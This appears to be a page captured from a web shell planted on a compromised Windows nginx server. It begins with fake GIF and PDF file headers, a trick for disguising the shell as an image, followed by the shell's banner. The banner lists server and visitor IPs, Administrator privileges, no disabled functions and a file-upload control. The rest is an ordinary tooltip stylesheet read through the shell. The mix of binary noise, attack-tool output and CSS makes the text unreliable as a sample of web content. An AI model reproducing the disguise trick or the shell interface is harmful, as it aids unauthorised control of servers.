GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Scheduler/css/ |
Upload File : |
@charset "utf-8"; /* css/tooltip.css */ #tooltipContainer { display:table; /** /width:650px;/**/ } #tooltipContainer > div#tooltipDiv{ display:table-cell; z-index:2000; } #tooltipDiv { background-color:#fcfcfc; border:2px solid #888; color:#000; font-family: Arial, Helvetica, sans-serif; font-size:.8em; padding:2px;position:absolute !important; text-align:left; visibility:hidden; /**/white-space:pre/**/; /** /max-width:650px;/**/ z-index:2000; } #tooltipDiv.attention { background-color:#000; border-color:#ff0; color:#ff0; } #tooltipDiv.button { background-color:transparent; border:0; color:#C0C0C0; } #tooltipDiv.disabled { background-color:transparent; border-color:#888; color:#C0C0C0; } #tooltipDiv.error { background-color:#a00; border-color:#888; color:#fff; }/**/ #tooltip.error:before { display:none; } #tooltip.error:after { display:none; }/**/ #tooltipDiv.info { background-color:white; border-color:darkgreen; color:darkgreen; } #tooltipDiv.normal { background-color:#fcfcfc; border-color:#888; color:#000; } #tooltipDiv.warn { background-color:#f90; border-color:#888; color:#000; }/**/ #tooltip.warn:before { display:none; } #tooltip.warn:after { display:none; }/**/ #tooltipDiv.opaque { opacity:.6; /** /filter:alpha(opacity=60);/**/ } #tooltipDiv table { font-size:1.0em } /* Needed so #tooltipDiv font-size:.8em; works */ abbr { border-bottom:2px dotted #ff0; cursor:help; /** /font-weight:bold; /**/ /** /line-height:1.2em;/**/ } abbr.attention { border-bottom:2px dotted #ff0; } abbr.button { border-bottom:0; } abbr.disabled { border-bottom:2px dotted #888; color:#888; } abbr.error { border-bottom:2px dotted #a00; } abbr.error:after { color:#fff; } abbr.error:before { content:"\00a0"; } abbr.error:after { content:" !\00a0"; } abbr.info { border-bottom:2px dotted darkgreen; } abbr.normal { border-bottom:2px dotted #888; } abbr.warn { border-bottom:2px dotted #fff; } abbr.warn:after { color:#fff; } abbr.warn:before { content:"\00a0"; } abbr.warn:after { content:" !\00a0"; } abbr.opaque { opacity:.6; /** /filter:alpha(opacity=60);/**/ } abbr.nodot { border-bottom:0; cursor:default } abbr.underline { border-bottom-style:solid; border-bottom-width:1px; } #movementDiv { background-color:#ffc; border:2px solid silver; color:#000; display:inline; position:absolute; overflow:hidden; visibility:hidden; text-align:left; vertical-align:top; z-index:2000; /** / width:1em; height:1em; /**/ }